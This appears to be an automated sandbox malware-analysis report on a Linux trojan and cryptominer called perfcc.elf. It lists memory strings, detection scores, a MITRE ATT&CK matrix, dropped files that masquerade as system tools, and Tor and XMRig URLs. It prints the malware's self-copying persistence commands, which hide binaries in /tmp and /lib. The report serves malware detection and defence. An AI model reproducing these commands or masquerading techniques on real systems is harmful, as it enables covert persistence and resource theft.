Source: perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	Binary or memory string: /proc/655/status/proc/655/cmdline/proc/655/cmdline/proc/656/statuse/proc/656/cmdline/proc/656/cmdline/proc/657/status/proc/657/cmdline/proc/657/cmdline/proc/657/status/proc/657/cmdline/proc/657/cmdline/proc/657/cmdline/proc/657/cmdline/proc/658/status/proc/658/cmdline/proc/658/cmdline/sbin/multipathd-d-s/sbin/multipathd -d -s/proc/667/status/proc/670/status/proc/670/cmdline/proc/670/cmdlinekd/proc/670/status/proc/670/cmdline/proc/670/cmdline/proc/670/cmdline/proc/670/cmdline/proc/674/status/proc/674/cmdline/proc/674/cmdline/proc/675/status/proc/675/cmdline/proc/675/cmdline/proc/676/statuss/proc/676/cmdline/proc/676/cmdline/proc/677/status/proc/677/cmdline/proc/677/cmdline/proc/720/status/proc/720/cmdline/proc/720/cmdline/usr/bin/VGAuthService/proc/721/status/proc/721/cmdline/proc/721/cmdline/usr/bin/vmtoolsd/proc/759/status/proc/759/cmdline/proc/759/cmdline/proc/759/status/proc/759/cmdline/proc/759/cmdline/proc/759/cmdline/proc/759/cmdline/proc/761/status/proc/761/cmdline/proc/761/cmdline/proc/761/status/proc/761/cmdline/proc/761/cmdlinesystemd Resolver,,,/proc/761/cmdline/proc/761/cmdline/proc/772/status/proc/772/cmdline/proc/772/cmdline/proc/774/statusAvahi mDNS daemon,,,/var/run/avahi-daemon/proc/774/cmdline/proc/774/cmdline/proc/777/status/proc/777/cmdline/proc/777/cmdline/proc/785/status/proc/785/cmdline/proc/785/cmdline/proc/788/status/proc/788/cmdline/proc/788/cmdline--run-startup-triggers/proc/788/status/proc/788/cmdline/proc/788/cmdline--run-startup-triggers/proc/789/status/proc/789/cmdline/proc/789/cmdline/proc/793/status/proc/793/cmdline/proc/793/cmdline/proc/796/status/proc/796/cmdline/proc/796/cmdlineswitcheroo-control/proc/796/status/proc/796/cmdline/proc/796/cmdlineswitcheroo-control/proc/796/cmdline/proc/796/cmdline/proc/797/status/proc/797/cmdline/proc/797/cmdline/proc/799/status/proc/799/cmdline/proc/799/cmdline/proc/800/status/proc/800/cmdline/proc/800/cmdline/proc/801/statusAvahi mDNS daemon,,,/var/run/avahi-daemon/proc/801/cmdline/proc/801/cmdlinekworker/1:4-events
Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	Binary or memory string: CKP9hgFsosmY
Source: perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	Binary or memory string: Name:vmtoolsd
Source: perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp	Binary or memory string: vmw_vsock_vmci_transport 32768 1 - Live 0xffffffffc051c000
Source: perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	Binary or memory string: vmw_vmci 69632 2 vmw_vsock_vmci_transport,vmw_balloon, Live 0xffffffffc0454000
Source: perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	Binary or memory string: HugetlbPages: 0 /usr/bin/VGAuthServicevmtoolsd
Source: perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	Binary or memory string: Co/usr/bin/vmtoolsd
Source: perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	Binary or memory string: dxhwdataiif %diif %sin: %sinlineinternip+netip/ddpip6greip6tnlipvlanipvtapjklgo`kernelkilledl31, llayer2listenm`{lj}memorymethodminutemmleyondots:netdnsnh4 %snh6 %snode%dnumberobjectoif %doif %sonlineonlinkopenvzpasswdpimregpopcntprefixpronetq.,1=qrdrandrdseedrdtscpreadatremoverenamereturnrune1 sNaPpYschemesecondselectsendtoserversetenvsocketsocks socks5splicestablestatusstreamstringstructsweep syslogsysmonsystemtar.gztar.sztar.xztelnetthreadtimerstorrc-tuntapuint16uint32uint64unuseduptimeustar ustarvirtiovmwarevwl"miwaitidzombie\|=<;=< %v=%v, (conn) (scan (scan) (trap Flags= MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
Source: perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	Binary or memory string: vmtoolsd
Source: perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	Binary or memory string: %s: no file info'66/%'2/)(i,5)(+#)4+(.4))4(( ", not a function--DisableNetwork.WithValue(type /etc/resolv.conf/tmp/.X11-unix/X0123456789ABCDEF0123456789abcdef23(452(07(74<???238418579101562572.37.217.3:414576-:-27;-2169770: value of type AboveSibling: %dAlready ReportedBUILDTIMEOUT_SETBondAdSelect(%d)Closing onion %vColormapNotify {Content-EncodingContent-LanguageContent-Length: EOS marker foundFRAME_SIZE_ERRORFirstKeycode: %dGC scavenge waitGC worker (idle)GNU.sparse.majorGNU.sparse.minorGODEBUG: value "HalfClosedRemoteImperial_AramaicInstRuneAnyNotNLKLITKMHTIKTNN@BJLBTMKTHONTL@NKNOMeroitic_CursiveMultiple ChoicesNETWORK_LIVENESSOCXDGEXDDBXDGLNFOther_AlphabeticPCIDB_CACHE_ONLYPayment RequiredPropertyNotify {Proxy-ConnectionQEMU Virtual CPURCodeFormatErrorRead after CloseRel: can't make ReparentNotify {SETTINGS_TIMEOUTSIGNONE: no trapSelectionClear {SignatureScheme(Unmanaged entityUpgrade RequiredUser-Agent: %s
Source: perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	Binary or memory string: edctf!mnfempty urlfec0::/10files,dnsfont/wofffork/execfuncargs(hchanLeafhead_bodyhmac-sha1hugepagesimage/bmpimage/gifimage/pnginittraceinterfaceinterruptinvalid nip6gretapipv6-icmpldPreloadlocalhostlocaltimemSpanDeadmSpanFreemap[%s]%smkdirtempmulticastnet/http.newosprocnil errornuma_nodeomitemptyoutput %spanicwaitpclmulqdqpervasivepreemptedprocessorprofBlockprotocol publickeyquestionsrecover: reflect: rwxrwxrwxscavtracesignal 32signal 33signal 34signal 35signal 36signal 37signal 38signal 39signal 40signal 41signal 42signal 43signal 44signal 45signal 46signal 47signal 48signal 49signal 50signal 51signal 52signal 53signal 54signal 55signal 56signal 57signal 58signal 59signal 60signal 61signal 62signal 63signal 64stackpoolsucceededtracebacktun_flagsu)nt4?-tkunderflowunhandledunknown%dvboxguestvendor_idvideo/avivideo/mp4wbufSpanswebsocketwireguard{ 9${55$1} stack=[~%<!~00!4
Source: perfctl, 6620.1.00007fe7204a3000.00007fe7204ad000.rw-.sdmp	Binary or memory string: VMware-42 18 ac 62 a3 71 07 4e-21 c5 02 4a d8 b3 43 6d
Source: perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	Binary or memory string: l9Name:vmtoolsd

Anti Debugging

Executes itself again with its parent PID as an argument (indicative of hampering debugging)

Source: /tmp/perfcc.elf (PID: 6264)	Process with PPID: /bin/sh -> /bin/sh -c "cp /proc/6252/exe /tmp/.perf.c/raid5wq && chmod +x /tmp/.perf.c/raid5wq"	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6374)	Process with PPID: /bin/sh -> /bin/sh -c "cp /proc/6269/exe /lib/libpprocps.so && chmod +x /lib/libpprocps.so"
Source: /tmp/.perf.c/raid5wq (PID: 6379)	Process with PPID: /bin/sh -> /bin/sh -c "cp /proc/6269/exe /lib/libfsnldev.so && chmod +x /lib/libfsnldev.so"
Source: /usr/bin/perfcc (PID: 6670)	Process with PPID: /bin/sh -> /bin/sh -c "cp /proc/6491/exe /tmp/.perf.c/gpg-agent && chmod +x /tmp/.perf.c/gpg-agent"

Language, Device and Operating System Detection

Executes the "getconf" command for querying system configuration variables

Source: /tmp/perfcc.elf (PID: 6244)	Getconf executable: /usr/bin/getconf getconf CLK_TCK	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6246)	Getconf executable: /usr/bin/getconf getconf PAGESIZE	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6257)	Getconf executable: /usr/bin/getconf getconf CLK_TCK	Jump to behavior
Source: /tmp/perfcc.elf (PID: 6259)	Getconf executable: /usr/bin/getconf getconf PAGESIZE	Jump to behavior
Source: /tmp/.perf.c/raid5wq (PID: 6274)	Getconf executable: /usr/bin/getconf getconf CLK_TCK
Source: /tmp/.perf.c/raid5wq (PID: 6276)	Getconf executable: /usr/bin/getconf getconf PAGESIZE
Source: /bin/perfcc (PID: 6484)	Getconf executable: /usr/bin/getconf getconf CLK_TCK
Source: /bin/perfcc (PID: 6489)	Getconf executable: /usr/bin/getconf getconf PAGESIZE
Source: /usr/bin/perfcc (PID: 6496)	Getconf executable: /usr/bin/getconf getconf CLK_TCK
Source: /usr/bin/perfcc (PID: 6500)	Getconf executable: /usr/bin/getconf getconf PAGESIZE
Source: /tmp/.perf.c/gpg-agent (PID: 6690)	Getconf executable: /usr/bin/getconf getconf CLK_TCK
Source: /tmp/.perf.c/gpg-agent (PID: 6694)	Getconf executable: /usr/bin/getconf getconf PAGESIZE

Executes the "who" command used to get a list of logged in users

Source: /tmp/.perf.c/raid5wq (PID: 6479)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6503)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6507)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6510)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6515)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6521)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6528)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6546)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6550)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6556)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6564)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6570)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6601)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6606)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6609)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6618)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6627)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6639)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6642)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6646)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6651)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6654)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6664)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6675)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6680)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6692)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6703)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6709)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6712)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6719)	Who executable: /usr/bin/who -> who
Source: /bin/sh (PID: 6726)	Who executable: /usr/bin/who -> who

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	2 Command and Scripting Interpreter	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Disable or Modify Tools	1 OS Credential Dumping	11 File and Directory Discovery	Remote Services	Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scripting	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Systemd Service	1 Process Injection	1 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Multi-hop Proxy	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Timestomp	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 File Deletion	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	22 Masquerading	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	2 Proxy	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Process Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Hidden Files and Directories	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Indicator Removal	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
perfcc.elf	68%	ReversingLabs	Linux.Trojan.Generic
perfcc.elf	62%	Virustotal		Browse
perfcc.elf	100%	Avira	EXP/AVI.CVE.suebo
perfcc.elf	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
/root/.config/cron/perfcc	100%	Avira	EXP/AVI.CVE.suebo
/tmp/.perf.c/gpg-agent	100%	Avira	EXP/AVI.CVE.suebo
/usr/lib/libfsnldev.so	100%	Avira	EXP/AVI.CVE.suebo
/usr/bin/.local/bin/top	100%	Avira	LINUX/Agent.sekdd
/tmp/.perf.c/perfctl	100%	Avira	LINUX/BitCoinMiner.rssij
/tmp/.perf.c/raid5wq	100%	Avira	EXP/AVI.CVE.suebo
/usr/lib/libpprocps.so	100%	Avira	EXP/AVI.CVE.suebo
/root/.config/cron/perfcc	100%	Joe Sandbox ML
/tmp/.perf.c/gpg-agent	100%	Joe Sandbox ML
/usr/lib/libfsnldev.so	100%	Joe Sandbox ML
/tmp/.perf.c/raid5wq	100%	Joe Sandbox ML
/usr/lib/libpprocps.so	100%	Joe Sandbox ML
/tmp/.perf.c/gpg-agent	68%	ReversingLabs	Linux.Trojan.Generic
/tmp/.perf.c/gpg-agent	62%	Virustotal		Browse
/tmp/.perf.c/perfctl	68%	ReversingLabs	Linux.Coinminer.Generic
/tmp/.perf.c/perfctl	59%	Virustotal		Browse
/tmp/.perf.c/raid5wq	68%	ReversingLabs	Linux.Trojan.Generic
/tmp/.perf.c/raid5wq	62%	Virustotal		Browse
/usr/bin/.local/bin/crontab	3%	ReversingLabs
/usr/bin/.local/bin/crontab	0%	Virustotal		Browse
/usr/bin/.local/bin/htop	3%	ReversingLabs
/usr/bin/.local/bin/ldd	50%	ReversingLabs	Linux.Trojan.Generic
/usr/bin/.local/bin/lsof	3%	ReversingLabs
/usr/bin/.local/bin/strace	3%	ReversingLabs
/usr/bin/.local/bin/top	66%	ReversingLabs	Linux.Trojan.Generic
/usr/bin/perfcc	68%	ReversingLabs	Linux.Trojan.Generic
/usr/bin/wizlmsh	53%	ReversingLabs	Linux.Trojan.Generic
/usr/lib/libfsnldev.so	68%	ReversingLabs	Linux.Trojan.Generic
/usr/lib/libpprocps.so	68%	ReversingLabs	Linux.Trojan.Generic

Domains

Source	Detection	Scanner	Label	Link
api.ipify.org	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Link
https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%s	0%	Virustotal	Browse
https://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks5.txt	1%	Virustotal	Browse
https://xmrig.com/wizard0	0%	Virustotal	Browse
https://bugs.launchpad.net/ubuntu/	0%	Virustotal	Browse
https://www.redhat.com/	0%	Virustotal	Browse
https://www.torproject.org/	1%	Virustotal	Browse
https://bugzilla.redhat.com/	0%	Virustotal	Browse
https://xmrig.com/wizard	2%	Virustotal	Browse
https://gcc.gnu.org/bugsNSt7__cxx1115basic_stringbufIcSt11char_traitsIcESaIcEEENSt7__cxx1119basic_is	0%	Virustotal	Browse
https://trac.torproject.org/8742	0%	Virustotal	Browse
http://freehaven.net/anonbib/#hs-attack06	0%	Virustotal	Browse
https://blog.torproject.org/blog/lifecycle-of-a-new-relay	0%	Virustotal	Browse
https://www.centos.org/	0%	Virustotal	Browse
https://blog.torproject.org/blog/lifecycle-of-a-new-relayReading/making	0%	Virustotal	Browse
https://gcc.gnu.org/bugs	0%	Virustotal	Browse
https://bugs.centos.org/	0%	Virustotal	Browse
https://www.ubuntu.com/	0%	Virustotal	Browse
https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%sDANGEROUS_SOCKS	0%	Virustotal	Browse
https://gitlab.com/cryptsetup/cryptsetup/wikis/DMCrypt	0%	Virustotal	Browse
https://www.torproject.org/documentation.html	1%	Virustotal	Browse
https://www.ubuntu.com/legal/terms-and-policies/privacy-policy	0%	Virustotal	Browse
https://trac.torproject.org/projects/tor/ticket/21155.	0%	Virustotal	Browse
https://pci-ids.ucw.cz/v2.2/pci.ids.gzindex	0%	Virustotal	Browse
http://api.ipify.org/	0%	Virustotal	Browse
https://xmrig.com/benchmark/%s	2%	Virustotal	Browse
https://www.torproject.org/download/download#warning	1%	Virustotal	Browse
https://help.ubuntu.com/	0%	Virustotal	Browse
https://www.torproject.org/download/download#warningThis	1%	Virustotal	Browse
https://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks4.txt	1%	Virustotal	Browse
https://trac.torproject.org/projects/tor/ticket/14917.	0%	Virustotal	Browse
https://www.torproject.org/docs/faq.html#BestOSForRelay	0%	Virustotal	Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	104.26.12.205	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api.ipify.org/	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks5.txt	perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp, sh, 6252.1.000000c000000000.000000c000800000.rw-.sdmp, nohup, 6252.1.000000c000000000.000000c000800000.rw-.sdmp, perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	true	1%, Virustotal, Browse	unknown
https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%s	perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	false	0%, Virustotal, Browse	unknown
https://bugs.launchpad.net/ubuntu/	perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp	false	0%, Virustotal, Browse	unknown
https://www.redhat.com/	perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	false	0%, Virustotal, Browse	unknown
https://6kzilz46krj47gfywu7qpcvo4gayfo7ttv4sqqo6tfzkln7ue4aibaid.onionhttps://6kzilz46krj47gfywu7qpc	perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp, sh, 6252.1.000000c000000000.000000c000800000.rw-.sdmp, nohup, 6252.1.000000c000000000.000000c000800000.rw-.sdmp, perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	true		unknown
https://bugzilla.redhat.com/	perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	false	0%, Virustotal, Browse	unknown
https://xmrig.com/wizard0	sh, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, nohup, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6620.1.0000000000400000.0000000000854000.r-x.sdmp	false	0%, Virustotal, Browse	unknown
https://www.torproject.org/	perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	false	1%, Virustotal, Browse	unknown
https://trac.torproject.org/8742	perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	false	0%, Virustotal, Browse	unknown
https://xmrig.com/wizard	sh, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, nohup, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6620.1.0000000000400000.0000000000854000.r-x.sdmp	false	2%, Virustotal, Browse	unknown
https://gcc.gnu.org/bugsNSt7__cxx1115basic_stringbufIcSt11char_traitsIcESaIcEEENSt7__cxx1119basic_is	sh, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, nohup, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6620.1.0000000000400000.0000000000854000.r-x.sdmp	false	0%, Virustotal, Browse	unknown
http://freehaven.net/anonbib/#hs-attack06	perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	false	0%, Virustotal, Browse	unknown
https://www.centos.org/	perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	false	0%, Virustotal, Browse	unknown
https://blog.torproject.org/blog/lifecycle-of-a-new-relay	perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	false	0%, Virustotal, Browse	unknown
https://www.ubuntu.com/	perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp	false	0%, Virustotal, Browse	unknown
https://bugs.centos.org/	perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	false	0%, Virustotal, Browse	unknown
https://blog.torproject.org/blog/lifecycle-of-a-new-relayReading/making	perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	false	0%, Virustotal, Browse	unknown
https://www.ubuntu.com/legal/terms-and-policies/privacy-policy	perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp	false	0%, Virustotal, Browse	unknown
https://gcc.gnu.org/bugs	sh, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, nohup, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6620.1.0000000000400000.0000000000854000.r-x.sdmp	false	0%, Virustotal, Browse	unknown
https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%sDANGEROUS_SOCKS	perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	false	0%, Virustotal, Browse	unknown
https://www.torproject.org/documentation.html	perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	false	1%, Virustotal, Browse	unknown
https://gitlab.com/cryptsetup/cryptsetup/wikis/DMCrypt	sedfK3s9f.220.dr	false	0%, Virustotal, Browse	unknown
https://trac.torproject.org/projects/tor/ticket/21155.	perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	false	0%, Virustotal, Browse	unknown
https://pci-ids.ucw.cz/v2.2/pci.ids.gzindex	perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	false	0%, Virustotal, Browse	unknown
https://xmrig.com/benchmark/%s	sh, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, nohup, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6616.1.0000000000400000.0000000000854000.r-x.sdmp, perfctl, 6620.1.0000000000400000.0000000000854000.r-x.sdmp	false	2%, Virustotal, Browse	unknown
https://help.ubuntu.com/	perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp	false	0%, Virustotal, Browse	unknown
https://www.torproject.org/download/download#warning	perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	false	1%, Virustotal, Browse	unknown
https://6kzilz46krj47gfywu7qpcvo4gayfo7ttv4sqqo6tfzkln7ue4aibaid.onion	perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp, sh, 6252.1.000000c000000000.000000c000800000.rw-.sdmp, nohup, 6252.1.000000c000000000.000000c000800000.rw-.sdmp, perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	true		unknown
https://raw.githubusercontent.com/monosans/proxy-list/main/proxies/socks4.txt	perfcc.elf, 6239.1.000000c000000000.000000c000400000.rw-.sdmp, sh, 6252.1.000000c000000000.000000c000800000.rw-.sdmp, nohup, 6252.1.000000c000000000.000000c000800000.rw-.sdmp, perfcc.elf, 6252.1.000000c000000000.000000c000800000.rw-.sdmp	true	1%, Virustotal, Browse	unknown
https://www.torproject.org/download/download#warningThis	perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	false	1%, Virustotal, Browse	unknown
https://gZ.~.	perfcc.elf, perfcc0.35.dr, gpg-agent.484.dr, libfsnldev.so.120.dr, perfctl.35.dr	false		unknown
https://www.torproject.org/docs/faq.html#BestOSForRelay	perfcc.elf, 6239.1.0000000000400000.00000000011cb000.r-x.sdmp, sh, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, nohup, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp, perfcc.elf, 6252.1.0000000000400000.00000000011cb000.r-x.sdmp	false	0%, Virustotal, Browse	unknown
